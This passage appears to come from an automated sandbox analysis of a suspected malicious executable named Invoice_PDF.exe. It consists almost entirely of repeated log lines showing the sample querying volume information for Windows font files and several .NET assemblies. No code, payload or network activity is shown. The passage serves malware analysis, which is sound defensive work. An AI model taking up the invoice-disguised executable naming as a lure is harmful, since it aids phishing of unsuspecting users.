                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Users\user\Desktop\Invoice_PDF.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
